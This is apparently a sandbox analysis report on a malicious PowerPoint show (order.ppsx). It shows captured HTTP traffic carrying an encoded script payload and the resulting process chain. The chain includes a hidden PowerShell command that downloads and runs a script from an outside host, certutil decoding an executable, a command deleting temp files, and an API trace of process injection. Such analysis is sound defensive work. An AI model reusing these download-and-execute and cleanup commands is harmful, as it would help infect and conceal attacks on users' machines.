Mai 28, 2017 17:18:55.592204094 MESZ	80	49234	46.21.169.110	192.168.1.16	HTTP/1.1 200 OK Date: Sun, 28 May 2017 15:18:49 GMT Server: Apache/2 Last-Modified: Sat, 27 May 2017 10:44:42 GMT ETag: "51da7-5507f2433da80" Accept-Ranges: bytes Content-Length: 335271 Vary: Accept-Encoding,User-Agent Data Raw: 23 40 7e 5e 6a 68 30 46 41 41 3d 3d 64 6d 33 72 52 48 6d 44 2f 32 2c 7b 3b 78 39 2b 57 6b 09 2b 5b 49 6b 6c 33 62 30 30 4b 44 3a 7f 2e 5c 6c 30 6b 09 6f 31 46 78 3b 09 4e 6e 30 62 55 2b 39 69 64 43 30 6b 25 33 32 34 2b 64 45 6b 71 5a 27 3b 09 4e 7f 30 6b 09 2b 39 49 2f 6d 33 72 25 53 74 72 5e 34 47 46 7b 3b 78 39 2b 30 62 55 6e 4e 70 2f 6d 33 72 25 2e 6e 37 6b 6e 68 3a 34 2b 6c 2a 78 3b 09 4e 2b 57 72 09 2b 5b 69 6b 43 30 6b 30 28 44 4b 6b 56 6b 26 57 78 45 09 4e 6e 30 62 78 6e 5b 70 2f 6c 30 72 25 31 57 78 44 55 4f 2f 3a 74 6d 78 71 27 3b 55 39 2b 57 6b 09 6e 4e 70 2f 43 56 62 25 6f 72 73 39 2b 5b 2c 52 78 21 78 5b 7f 30 62 78 2b 39 69 6b 43 33 62 25 6e 6c 4d 59 34 7f 32 27 45 09 5b 2b 36 6b 78 7f 5b 49 2f 6d 33 62 25 6e 6c 2e 4f 34 76 66 27 21 55 4e 7f 30 72 55 7f 4e 69 64 43 30 6b 30 59 34 6e Data Ascii: #@~^jh0FAA==dm3rRHmD/2,{;x9+Wk+[Ikl3b00KD:.\l0ko1Fx;Nn0bU+9idC0k%324+dEkqZ';N0k+9I/m3r%Str^4GF{;x9+0bUnNp/m3r%.n7knh:4+l*x;N+Wr+[ikC0k0(DKkVk&WxENn0bxn[p/l0r%1WxDUO/:tmxq';U9+WknNp/CVb%ors9+[,Rx!x[0bx+9ikC3b%nlMY42'E[+6kx[I/m3b%nl.O4vf'!UN0rUNidC0k0Y4n	1
Mai 28, 2017 17:18:55.620583057 MESZ	80	49234	46.21.169.110	192.168.1.16	Data Raw: 7f 46 66 7b 45 09 4e 2b 36 6b 09 6e 4e 70 2f 43 33 62 25 35 3b 62 6d 33 32 54 27 21 78 4e 7f 57 72 78 7f 4e 70 2f 43 33 72 30 44 6b 68 2b 6c 71 27 21 78 5b 6e 36 6b 78 6e 5b 70 2f 43 33 62 30 34 57 3b 4d 26 2b 27 45 09 4e 7f 57 6b 09 2b 5b 69 6b Data Ascii: Ff{EN+6knNp/C3b%5;bm32T'!xNWrxNp/C3r0Dkh+lq'!x[n6kxn[p/C3b04W;M&+'ENWk+[iklVrRVlDO+MG%{;UN0bxnNIdm3r%D;DkULyc';U9+Wkn9idm3b%/DDKUol!xENnWbx+9I/m3kRhGD 2';x[n6kU+9I/m3r04+k.dtlzv2x!x[0bx+9ikC3b%Otx+q{Ex9n0bx+9Idl0kRw.kU^/**{;x9+	2
Mai 28, 2017 17:18:55.620608091 MESZ	80	49234	46.21.169.110	192.168.1.16	Data Raw: 4f 62 57 78 63 43 28 2b 2e 59 42 22 42 78 53 73 23 50 44 2b 44 45 4d 55 50 55 59 2e 6b 09 6f 2c 45 36 44 57 73 2f 74 6d 44 4a 33 45 2f 57 72 5f 72 4a 51 4a 5b 6e 72 54 63 60 33 76 63 46 42 62 51 6c 23 38 53 7a 7f 6c 2a 29 45 71 79 2a 76 29 24 45 Data Ascii: ObWxcC(+.YB"BxSs#PD+DEMUPUY.ko,E6DWs/tmDJ3E/Wr_rJQJ[nrTc`3vcFBbQl#8Szl)Eqyv)$EN+WlED`6EUmDkGUv#MnY!Dx,O.Ei)~T~TS8#QkAGm)W;mYrG`C4.D~"BxB:#PDOEMx~?DDrUT$J6.WsZtm.E_rZKJQJEQrNnJYc`3B0E#_Xb)~AlMdFvlEFy!B)$EdhFlvTv0;U1YkKU`DO;DPDD;	4
Mai 28, 2017 17:18:55.620879889 MESZ	80	49234	46.21.169.110	192.168.1.16	Data Raw: 49 4e 42 21 53 21 42 71 23 33 09 4f 34 57 6c 29 57 3b 09 6d 4f 6b 4b 55 76 6c 38 7f 44 44 7e 79 42 78 42 68 23 50 44 6e 59 21 44 55 7e 55 59 44 62 55 6f 5d 4a 30 4d 47 68 5a 34 6c 4d 4a 51 4a 2f 47 72 5f 45 4a 33 45 4e 7f 4a 44 63 76 5f 42 58 71 Data Ascii: INB!S!Bq#3O4Wl)W;mOkKUvl8DD~yBxBh#PDnY!DU~UYDbUo]J0MGhZ4lMJQJ/Gr_EJ3ENJDcv_BXqE#Q*NB/4mVR)BO,EN$EY4cmBDc6Ex1OkKx``.+DEMx~Y.;iN~ZS!BFbQPh+.nlll0!U1YrKxvl4DDSyBxS:.nDED~?DDkL,J6DK:/tC.r_EZKE_rJQE9+JDcv_v,lv_X*8BhkR)E1%E8,BS+.nllBYc0	5
Mai 28, 2017 17:18:55.658356905 MESZ	80	49234	46.21.169.110	192.168.1.16	Data Raw: 44 7e 22 7e 09 53 3a 2a 09 2e 6e 44 45 44 55 7e 55 59 2e 6b 09 4c 5d 4a 57 4d 57 73 5a 74 6d 44 72 51 4a 3b 57 45 5f 72 4a 51 45 39 2b 4a 59 63 60 33 42 63 46 76 62 5f 6c 23 29 7e 4f 74 47 58 3d 42 31 47 45 4e 24 45 3b 3b 72 4f 6c 42 44 63 36 45 Data Ascii: D~"~S:.nDEDU~UY.kL]JWMWsZtmDrQJ;WE_rJQE9+JYc`3BcFvb_l#)~OtGX=B1GEN$E;;rOlBDc6EUmDrKxcM+Y!D~YMEni)~TSZ~F*Q1tlMr0l=0!x^YrG`C4.YBySUB:#`.Y;D~UY.bxT$J6DKhZ4l.J3J/Gr_JrQJ9+JYcc_Ec+Bb_Xb)~LkOlB8Fv)$B^4mDr%mvY`W!x1YkKxvbM+OEMx~OME+pN~Z~	6
Mai 28, 2017 17:18:55.658390045 MESZ	80	49234	46.21.169.110	192.168.1.16	Data Raw: 2c 77 3b 21 5a 2a 46 2d 3b 21 54 58 32 2d 3b 21 5a 58 26 27 45 54 54 6c 26 2d 3b 54 5a 26 71 2d 21 54 5a 26 2b 7b 59 34 6b 2f 5d 09 6b 3b 44 57 6c 6c 30 21 78 5e 4f 62 57 78 76 43 34 7f 44 59 42 22 53 78 42 3a 2a 09 2e 2b 4f 3b 4d 78 7e 3f 44 2e Data Ascii: ,w;!ZF-;!TX2-;!ZX&'ETTl&-;TZ&q-!TZ&+{Y4k/]k;DWll0!x^ObWxvC4DYB"SxB:.+O;Mx~?D.ko,E6DWh/4l.J3E;WE3Jr_J9+rD`v_v%yBbQl#8B.k1tv=vq!OB)$v/;.WlvTvWEmOrKx`b`M+OEMU,Y.!+p8~Z~ZSF_`t!x1C=0E^YbWxvC8+MYBySxSh.+D;DPjOMkxL,r0.Ws/4l.r_rZWr_rE_rNnJ	8
Mai 28, 2017 17:18:55.658648014 MESZ	80	49234	46.21.169.110	192.168.1.16	Data Raw: 78 4c 2c 72 30 44 4b 68 5a 34 6c 44 72 51 45 5a 4b 4a 33 4a 45 5f 45 5b 7f 4a 44 60 76 51 42 38 21 2a 76 2a 5f 2a 62 4e 42 57 6e 44 57 2a 57 29 76 4f 2a 45 38 24 45 56 4b 2d 2b 6c 6c 76 54 76 30 3b 55 31 59 6b 4b 55 60 2a 09 44 7f 4f 3b 44 09 50 Data Ascii: xL,r0DKhZ4lDrQEZKJ3JE_E[JD`vQB8!v_bNBWnDWW)vOE8$EVK-+llvTv0;U1YkKU`DO;DPDD;+INB!S!Bq#3WrN%{C=0;x1ObWUvl(+DD~.SxB:bM+O;MxPUODbxo]EWDK:;tCDEQrZGJ3EJ3J[nrT`cQE,BQl#NBEaVWW)Eq!8BN$E0rU9%GmvTv0E^OkKxv#`DnO!DUPD.EiNSZ~!Sq_`trlll6E	9
Mai 28, 2017 17:18:55.691008091 MESZ	80	49234	46.21.169.110	192.168.1.16	Data Raw: 76 60 33 76 46 38 46 76 23 33 2a 62 4e 42 44 2b 73 43 6b 6c 29 42 38 71 31 42 29 24 45 3a 6e 3f 47 71 6c 6c 76 54 76 57 45 09 6d 4f 72 4b 78 60 62 60 4d 2b 4f 45 4d 55 2c 59 2e 21 2b 70 38 7e 5a 7e 5a 53 46 2a 5f 60 59 34 6c 4f 7b 6d 29 30 21 55 Data Ascii: v`3vF8Fv#3bNBD+sCkl)B8q1B)$E:n?GqllvTvWEmOrKx`b`M+OEMU,Y.!+p8~Z~ZSF_`Y4lO{m)0!UmDkWcC4DD~"~USs#`DOEMx~jDDkUL]JWDKh;tCMJ3JZKJ3EJ3J[+rTcc3BFZB_*NSVmYD+{)vqycv8]vY4lO{mBTcW!x^YbG`bPDYEMx,OD!+I8B!STBF#3`0b,l=W;x1YbWU`C8DO~.SxB:b`M+Y;.	10
Mai 28, 2017 17:18:55.691301107 MESZ	80	49234	46.21.169.110	192.168.1.16	Data Raw: 3b 44 09 7e 55 59 2e 62 78 54 24 4a 36 44 4b 68 5a 34 6c 2e 4a 33 4a 2f 47 72 5f 4a 72 51 4a 39 2b 4a 59 63 63 5f 45 46 38 46 76 23 51 58 2a 38 53 59 34 72 76 3d 42 71 71 6c 42 38 2c 76 6b 59 72 25 6d 76 59 60 57 21 78 31 59 6b 4b 78 76 62 09 4d Data Ascii: ;D~UY.bxT$J6DKhZ4l.J3J/Gr_JrQJ9+JYcc_EF8Fv#QX8SY4rv=BqqlB8,vkYr%mvY`W!x1YkKxvbM+OEMx~OME+pN~Z~!BqbTp\mD~/CVb%4+b./tlz2'Y4rk$`mm.Oll6EmYbWcl(+.YBySUB:#P.+DED~jYMko,JW.K:/tm.J3J/Gr_JEQrNnJYcv_v+!E#_l#)S+7D{)EFq1E8$E^lM,lEDc0!x1YrWUc.+D	11
Mai 28, 2017 17:18:55.694314957 MESZ	80	49234	46.21.169.110	192.168.1.16	Data Raw: 45 38 2c 42 31 47 4f 6c 76 59 60 36 45 78 31 59 62 47 78 76 23 60 44 7f 59 3b 2e 09 50 59 4d 3b 2b 70 38 7e 5a 53 54 7e 38 23 33 09 73 6b 31 43 3d 30 3b 78 31 4f 6b 4b 78 63 43 28 2b 44 4f 53 2e 7e 55 7e 73 62 50 44 6e 44 45 4d 78 50 55 59 4d 72 Data Ascii: E8,B1GOlvY`6Ex1YbGxv#`DY;.PYM;+p8~ZST~8#3sk1C=0;x1OkKxcC(+DOS.~U~sbPDnDEMxPUYMrxT$E0MWh/4lDrQJ;WJ3EE_rNJD`cQE%fBQ8S8!kVO=BqFlv)$v^kOlBY`6;x1YrW`b`M+Y!.x,YD!nI8B!B!SFbQPDnGml0!x^ObWxcC(+.YB"BxSs#PD+DEMUPUY.ko,E6DWs/tmDJ3E/Wr_rJQJ[nrTc	12
Mai 28, 2017 17:18:55.701215982 MESZ	80	49234	46.21.169.110	192.168.1.16	Data Raw: 44 72 57 09 60 62 60 4d 2b 59 3b 2e 09 50 4f 44 21 6e 70 38 53 5a 7e 5a 7e 46 2a 5f 50 41 74 62 2a 43 29 36 45 55 5e 44 6b 57 09 63 6c 28 2b 44 44 53 22 7e 09 7e 73 23 60 44 6e 4f 21 44 55 50 55 4f 44 62 78 4c 2c 72 30 44 47 68 3b 74 43 44 72 51 Data Ascii: DrW`b`M+Y;.POD!np8SZ~Z~F_PAtbC)6EU^DkWcl(+DDS"~~s#`DnO!DUPUODbxL,r0DGh;tCDrQrZGr_rJ_rNETv`QBO vb3#)SwM+%=vq 8B)$vh4rllvTvWEmOrKx`b`M+OEMU,Y.!+p8~Z~ZSF_`/4lsm)0!UmDkWcC4DD~"~USs#`DOEMx~jDDkUL]JWDKh;tCMJ3JZKJ3EJ3J[+rTcc3BF8qB_**NS	14

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: POWERPNT.EXE PID: 2256 Parent PID: 1344

General

Start time:	17:18:08
Start date:	28/05/2017
Path:	C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Microsoft Office\Office14\powerpnt.exe' /s 'C:\order.ppsx'
Imagebase:	0x2d560000
File size:	2162024 bytes
MD5 hash:	E24133DD836D99182A6227DCF6613D08
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: powershell.exe PID: 2404 Parent PID: 2256

General

Start time:	17:19:10
Start date:	28/05/2017
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -NonI -W Hidden -Exec Bypass 'IEX (New-Object System.Net.WebClient).DownloadFile('http:'+[char] 0x2F+[char] 0x2F+'cccn.nl'+[char] 0x2F+'c.php',\'$env:temp\ii.jse\'); Invoke-Item \'$env:temp\ii.jse\''
Imagebase:	0x22640000
File size:	452608 bytes
MD5 hash:	92F44E405DB16AC55D97E3BFE3B132FA
Programmed in:	.Net C# or VB.NET

Chronological Activities

Analysis Process: wscript.exe PID: 2496 Parent PID: 2404

General

Start time:	17:19:15
Start date:	28/05/2017
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\System32\WScript.exe' 'C:\Users\LUKETA~1\AppData\Local\Temp\ii.jse'
Imagebase:	0x76e20000
File size:	141824 bytes
MD5 hash:	979D74799EA6C8B8167869A68DF5204A
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: certutil.exe PID: 2988 Parent PID: 2496

General

Start time:	17:20:18
Start date:	28/05/2017
Path:	C:\Windows\System32\certutil.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\System32\certutil.exe' -decode C:\Users\LUKETA~1\AppData\Local\Temp\168.gop C:\Users\LUKETA~1\AppData\Local\Temp\484.exe
Imagebase:	0xd90000
File size:	903168 bytes
MD5 hash:	0D52559AEF4AA5EAC82F530617032283
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: cmd.exe PID: 3052 Parent PID: 2496

General

Start time:	17:20:38
Start date:	28/05/2017
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\System32\cmd.exe' /c start C:\Users\LUKETA~1\AppData\Local\Temp\484.exe
Imagebase:	0x4a8f0000
File size:	302592 bytes
MD5 hash:	AD7B9C14083B52BC532FBA5948342B98
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: 484.exe PID: 3076 Parent PID: 3052

General

Start time:	17:20:38
Start date:	28/05/2017
Path:	C:\Users\LUKETA~1\AppData\Local\Temp\484.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\LUKETA~1\AppData\Local\Temp\484.exe
Imagebase:	0x400000
File size:	237568 bytes
MD5 hash:	13CDBD8C31155610B628423DC2720419
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: cmd.exe PID: 3104 Parent PID: 2496

General

Start time:	17:20:48
Start date:	28/05/2017
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\System32\cmd.exe' /U /Q /C del /Q/F %TEMP%\.exe && del /Q/F %TEMP%\.gop && del /Q/F %TEMP%\.txt && del /Q/F %TEMP%\.log && del /Q/F %TEMP%\*.jse
Imagebase:	0x76e20000
File size:	302592 bytes
MD5 hash:	AD7B9C14083B52BC532FBA5948342B98
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: mstsc.exe PID: 3140 Parent PID: 3076

General

Start time:	17:21:10
Start date:	28/05/2017
Path:	C:\Windows\System32\mstsc.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\mstsc.exe 'C:\Users\LUKETA~1\AppData\Local\Temp\484.exe'
Imagebase:	0xdd0000
File size:	1068544 bytes
MD5 hash:	4676AAA9DDF52A50C829FEDB4EA81E54
Programmed in:	C, C++ or other language

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: 484.exe PID: 3076 Parent PID: 3052

Execution Graph

Execution Coverage:	3.5%
Dynamic/Decrypted Code Coverage:	3.8%
Signature Coverage:	26.6%
Total number of Nodes:	1615
Total number of Limit Nodes:	27

Executed Functions

Function 0040EFB9, Relevance: 121.1, APIs: 45, Strings: 24, Instructions: 363

APIs

SetErrorMode.KERNELBASE(00000000), ref: 0040EFD4
SetErrorMode.KERNELBASE(00000000), ref: 0040EFDA
GetProcessHeap.KERNEL32(00000008,0000000D), ref: 0040F006
HeapAlloc.KERNEL32(00000000), ref: 0040F009
GetCapture.USER32 ref: 0040F024
GetProcessHeap.KERNEL32(00000008,00000014), ref: 0040F088
HeapAlloc.KERNEL32(00000000), ref: 0040F08B
GetFocus.USER32 ref: 0040F09F
LoadLibraryA.KERNEL32(?), ref: 0040F0C9
GetProcAddress.KERNEL32(00000000), ref: 0040F0D0
GetCommandLineW.KERNEL32 ref: 0040F0D8
GetProcessHeap.KERNEL32(00000008,00000208), ref: 0040F0F8
HeapAlloc.KERNEL32(00000000), ref: 0040F101
GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0040F11C
GetProcessHeap.KERNEL32(00000008,00000029), ref: 0040F168
RtlAllocateHeap.NTDLL(00000000), ref: 0040F16B
IsSystemResumeAutomatic.KERNEL32 ref: 0040F17B
GetProcessHeap.KERNEL32(?,00000000), ref: 0040F1A5
GetModuleHandleW.KERNEL32(00000000,?), ref: 0040F1B8

Part of subcall function 00409C2E: GetProcessHeap.KERNEL32(00000008,00000208,?,00000000,76E6FE8D), ref: 00409C4C
Part of subcall function 00409C2E: HeapAlloc.KERNEL32(00000000), ref: 00409C59
Part of subcall function 00409C2E: GetProcessHeap.KERNEL32(?,?,?,?,?,?,00000008,?,?,0000005D), ref: 00409D22
Part of subcall function 00409C2E: HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,00000008,?,?,0000005D), ref: 00409D29
Part of subcall function 00409C2E: GetProcessHeap.KERNEL32(?,?,?,?,?,?,00000008,?,?,0000005D), ref: 00409D43
Part of subcall function 00409C2E: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000104,?,?,?,?,?,?,00000008,?,?,0000005D), ref: 00409D74
Part of subcall function 00409C2E: lstrcatW.KERNEL32(?,?), ref: 00409D85
Part of subcall function 00409C2E: lstrcatW.KERNEL32(?,00410518), ref: 00409D8D
Part of subcall function 00409C2E: lstrcatW.KERNEL32(?,?), ref: 00409D93
Part of subcall function 00409C2E: lstrcatW.KERNEL32(?,00410520), ref: 00409D9B
Part of subcall function 00409C2E: Sleep.KERNEL32(000003E8,?,?,?,?,?,?,00000008,?,?,0000005D), ref: 00409DAA
Part of subcall function 00409C2E: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,0800000C,00000000,00000000,?,?), ref: 00409DCB
Part of subcall function 00409C2E: GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,?,00000008,?,?,0000005D), ref: 00409DD4
Part of subcall function 00409C2E: HeapFree.KERNEL32(00000000), ref: 00409DDB
Part of subcall function 00409C2E: GetThreadContext.KERNEL32(?,00010002), ref: 00409E05
Part of subcall function 00409C2E: SetLastError.KERNEL32(00000000), ref: 00409FC9
Part of subcall function 00409C2E: ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00409FF4
Part of subcall function 00409C2E: IsBadReadPtr.KERNEL32(EpiTo,00000001), ref: 0040A01C
Part of subcall function 00409C2E: IsBadReadPtr.KERNEL32(?,00000004), ref: 0040A038
Part of subcall function 00409C2E: WriteProcessMemory.KERNELBASE(?,?,?,?,00000000), ref: 0040A068
Part of subcall function 00409C2E: ResumeThread.KERNELBASE(?), ref: 0040A07E
Part of subcall function 00409C2E: CloseHandle.KERNEL32(00000000), ref: 0040A0A2
Part of subcall function 00409C2E: TerminateProcess.KERNEL32(?,00000000), ref: 0040A0B5
Part of subcall function 00409C2E: CloseHandle.KERNEL32(?), ref: 0040A0BF
Part of subcall function 00409C2E: CloseHandle.KERNEL32(?), ref: 0040A0C9
Part of subcall function 00409C2E: GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040A0D6
Part of subcall function 00409C2E: HeapFree.KERNEL32(00000000), ref: 0040A0DD

ExitProcess.KERNEL32 ref: 0040F1C9

Part of subcall function 0040EF8B: VirtualQuery.KERNEL32(0040EF8B,00000000,0000001C,?), ref: 0040EFAB

Part of subcall function 00401C80: LoadLibraryA.KERNEL32(?), ref: 00401CC1
Part of subcall function 00401C80: GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00401CE1
Part of subcall function 00401C80: GetModuleHandleExA.KERNEL32(00000001,00000000,?), ref: 00401CF8

GetCurrentProcess.KERNEL32 ref: 0040F1F2

Part of subcall function 0040E897: OpenProcessToken.ADVAPI32(00000000,00000008,?,00000000,00000000,00000000,?,0040F1FF), ref: 0040E8A6
Part of subcall function 0040E897: GetTokenInformation.ADVAPI32(?,00000019,00000000,00000000,?,?,?,0040F1FF), ref: 0040E8C2
Part of subcall function 0040E897: GetLastError.KERNEL32(?,0040F1FF), ref: 0040E8D0
Part of subcall function 0040E897: GetProcessHeap.KERNEL32(00000008,?,76E6FE8D,?,0040F1FF), ref: 0040E8E1
Part of subcall function 0040E897: HeapAlloc.KERNEL32(00000000,?,0040F1FF), ref: 0040E8E8
Part of subcall function 0040E897: GetTokenInformation.ADVAPI32(?,00000019,00000000,?,?,?,0040F1FF), ref: 0040E901
Part of subcall function 0040E897: GetSidSubAuthorityCount.ADVAPI32(00000000,?,0040F1FF), ref: 0040E90D
Part of subcall function 0040E897: GetSidSubAuthority.ADVAPI32(00000000,?,?,0040F1FF), ref: 0040E924
Part of subcall function 0040E897: GetProcessHeap.KERNEL32(00000000,00000000,?,0040F1FF), ref: 0040E946
Part of subcall function 0040E897: HeapFree.KERNEL32(00000000,?,0040F1FF), ref: 0040E94D
Part of subcall function 0040E897: CloseHandle.KERNEL32(?), ref: 0040E957

GetVersion.KERNEL32 ref: 0040F201
HeapFree.KERNEL32(00000000), ref: 0040F49D

Part of subcall function 0040A0EE: GetProcessHeap.KERNEL32(00000008,00000069,?,00000000,76E6FE8D), ref: 0040A1A4
Part of subcall function 0040A0EE: HeapAlloc.KERNEL32(00000000), ref: 0040A1A7
Part of subcall function 0040A0EE: ReleaseCapture.USER32 ref: 0040A1C2
Part of subcall function 0040A0EE: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000104), ref: 0040A1F5
Part of subcall function 0040A0EE: GetShortPathNameW.KERNEL32(?,?,00000104), ref: 0040A206
Part of subcall function 0040A0EE: GetProcessHeap.KERNEL32(00000008,0000003D), ref: 0040A258
Part of subcall function 0040A0EE: HeapAlloc.KERNEL32(00000000), ref: 0040A25B
Part of subcall function 0040A0EE: GetForegroundWindow.USER32 ref: 0040A272
Part of subcall function 0040A0EE: wsprintfW.USER32 ref: 0040A2A6
Part of subcall function 0040A0EE: GetProcessHeap.KERNEL32(00000008,00000019), ref: 0040A2E6
Part of subcall function 0040A0EE: HeapAlloc.KERNEL32(00000000), ref: 0040A2E9
Part of subcall function 0040A0EE: RevertToSelf.ADVAPI32 ref: 0040A300
Part of subcall function 0040A0EE: CoInitializeEx.OLE32(00000000,00000006), ref: 0040A362
Part of subcall function 0040A0EE: GetProcessHeap.KERNEL32(00000008,0000000D), ref: 0040A392
Part of subcall function 0040A0EE: HeapAlloc.KERNEL32(00000000), ref: 0040A395
Part of subcall function 0040A0EE: GetCapture.USER32 ref: 0040A3AC
Part of subcall function 0040A0EE: GetProcessHeap.KERNEL32(00000008,00000011), ref: 0040A40B
Part of subcall function 0040A0EE: HeapAlloc.KERNEL32(00000000), ref: 0040A40E
Part of subcall function 0040A0EE: GetDoubleClickTime.USER32 ref: 0040A422
Part of subcall function 0040A0EE: LoadLibraryA.KERNEL32(57495761), ref: 0040A44C
Part of subcall function 0040A0EE: GetProcAddress.KERNEL32(00000000), ref: 0040A453
Part of subcall function 0040A0EE: GetLastError.KERNEL32 ref: 0040A45D
Part of subcall function 0040A0EE: Sleep.KERNEL32(00000064), ref: 0040A46C
Part of subcall function 0040A0EE: GetForegroundWindow.USER32 ref: 0040A472
Part of subcall function 0040A0EE: CoUninitialize.OLE32 ref: 0040A48B
Part of subcall function 0040A0EE: CloseHandle.KERNEL32(?), ref: 0040A494
Part of subcall function 0040A0EE: GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040A4A3
Part of subcall function 0040A0EE: HeapFree.KERNEL32(00000000), ref: 0040A4AC
Part of subcall function 0040A0EE: GetProcessHeap.KERNEL32(00000000,57495761), ref: 0040A4B2
Part of subcall function 0040A0EE: HeapFree.KERNEL32(00000000), ref: 0040A4B5
Part of subcall function 0040A0EE: GetProcessHeap.KERNEL32(00000000,4E5A666B), ref: 0040A4BB
Part of subcall function 0040A0EE: HeapFree.KERNEL32(00000000), ref: 0040A4BE
Part of subcall function 0040A0EE: GetProcessHeap.KERNEL32(00000000,31653832), ref: 0040A4C4
Part of subcall function 0040A0EE: HeapFree.KERNEL32(00000000), ref: 0040A4C7
Part of subcall function 0040A0EE: GetProcessHeap.KERNEL32(00000000,?), ref: 0040A4CD
Part of subcall function 0040A0EE: HeapFree.KERNEL32(00000000), ref: 0040A4D0

GetProcessHeap.KERNEL32(00000000,?), ref: 0040F214
HeapFree.KERNEL32(00000000), ref: 0040F217
GetProcessHeap.KERNEL32(00000008,0000009D), ref: 0040F2D1
HeapAlloc.KERNEL32(00000000), ref: 0040F2D4
GetActiveWindow.USER32 ref: 0040F2EB
GetProcessHeap.KERNEL32(00000008,00000051), ref: 0040F374
HeapAlloc.KERNEL32(00000000), ref: 0040F377
GetModuleHandleW.KERNEL32(00000000), ref: 0040F38D
GetProcessHeap.KERNEL32(00000008,00000208), ref: 0040F3BF
HeapAlloc.KERNEL32(00000000), ref: 0040F3C2
GetProcessHeap.KERNEL32(00000008,00000208), ref: 0040F3D4
HeapAlloc.KERNEL32(00000000), ref: 0040F3D7
ExpandEnvironmentStringsW.KERNEL32(?,KCBqiNhR7x,00000104), ref: 0040F405
ExpandEnvironmentStringsW.KERNEL32(00000000,00000005,00000104), ref: 0040F410

Part of subcall function 0040BE1A: GetProcessHeap.KERNEL32(00000008,0000000E,76E645DF,00000000,76E6FE8D), ref: 0040BE64
Part of subcall function 0040BE1A: HeapAlloc.KERNEL32(00000000), ref: 0040BE6B
Part of subcall function 0040BE1A: GetFocus.USER32 ref: 0040BE7C
Part of subcall function 0040BE1A: GetEnvironmentVariableA.KERNEL32(00000000,?,00000104), ref: 0040BEB5
Part of subcall function 0040BE1A: lstrlenA.KERNEL32(?), ref: 0040BEC9
Part of subcall function 0040BE1A: GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040BEEA
Part of subcall function 0040BE1A: HeapFree.KERNEL32(00000000), ref: 0040BEF1

Sleep.KERNEL32(000000FF), ref: 0040F4A1

Part of subcall function 0040B8CA: PathFindFileNameW.SHLWAPI(76E645DF,00000000,76E6FE8D,?,?,?,?,?,?,KCBqiNhR7x,0040F429), ref: 0040B8D9

StrStrIW.SHLWAPI(7142434B), ref: 0040F44D
StrStrIW.SHLWAPI(00000005), ref: 0040F45C

Part of subcall function 004019C7: Sleep.KERNEL32(00002710,76AD46E9,76E6FE8D,?,?,?,?,?,KCBqiNhR7x,0040F467), ref: 00401A14
Part of subcall function 004019C7: GetModuleHandleW.KERNEL32(00000000,?,?,?,?,?,KCBqiNhR7x,0040F467), ref: 00401A24
Part of subcall function 004019C7: VirtualProtect.KERNEL32(00412000,00000184,00000040,?,?,?,?,?,?,KCBqiNhR7x,0040F467), ref: 00401A85
Part of subcall function 004019C7: VirtualProtect.KERNEL32(00412000,00000184,?,?,?,?,?,?,?,KCBqiNhR7x,0040F467), ref: 00401A9F
Part of subcall function 004019C7: GlobalAddAtomW.KERNEL32 ref: 00401ABF
Part of subcall function 004019C7: AddAtomW.KERNEL32 ref: 00401ACB
Part of subcall function 004019C7: GetProcessHeap.KERNEL32(00000000,?,?,?,?,KCBqiNhR7x,0040F467), ref: 00401AFB
Part of subcall function 004019C7: HeapFree.KERNEL32(00000000), ref: 00401B02

Part of subcall function 0040890F: lstrlenW.KERNEL32(001CFDA8,76AD46E9,7142434B,76E6FE8D), ref: 00408921
Part of subcall function 0040890F: GetProcessHeap.KERNEL32(00000008,00000000), ref: 00408941
Part of subcall function 0040890F: HeapAlloc.KERNEL32(00000000), ref: 00408944
Part of subcall function 0040890F: GetProcessHeap.KERNEL32(00000008,?), ref: 00408963
Part of subcall function 0040890F: HeapAlloc.KERNEL32(00000000), ref: 00408966
Part of subcall function 0040890F: lstrcpyW.KERNEL32(00000000,?), ref: 0040897B
Part of subcall function 0040890F: GetProcessHeap.KERNEL32(00000008,00000021), ref: 004089BB
Part of subcall function 0040890F: HeapAlloc.KERNEL32(00000000), ref: 004089BE
Part of subcall function 0040890F: GetClipboardOwner.USER32 ref: 004089D2
Part of subcall function 0040890F: GetTickCount.KERNEL32(00000005), ref: 004089FE
Part of subcall function 0040890F: wsprintfW.USER32 ref: 00408A0F
Part of subcall function 0040890F: wsprintfW.USER32 ref: 00408A1F
Part of subcall function 0040890F: GetProcessHeap.KERNEL32(00000008,00000104), ref: 00408A33
Part of subcall function 0040890F: HeapAlloc.KERNEL32(00000000), ref: 00408A36
Part of subcall function 0040890F: GetTickCount.KERNEL32 ref: 00408A47
Part of subcall function 0040890F: GetProcessHeap.KERNEL32(00000008,00000044), ref: 00408AE0
Part of subcall function 0040890F: HeapAlloc.KERNEL32(00000000), ref: 00408AE3
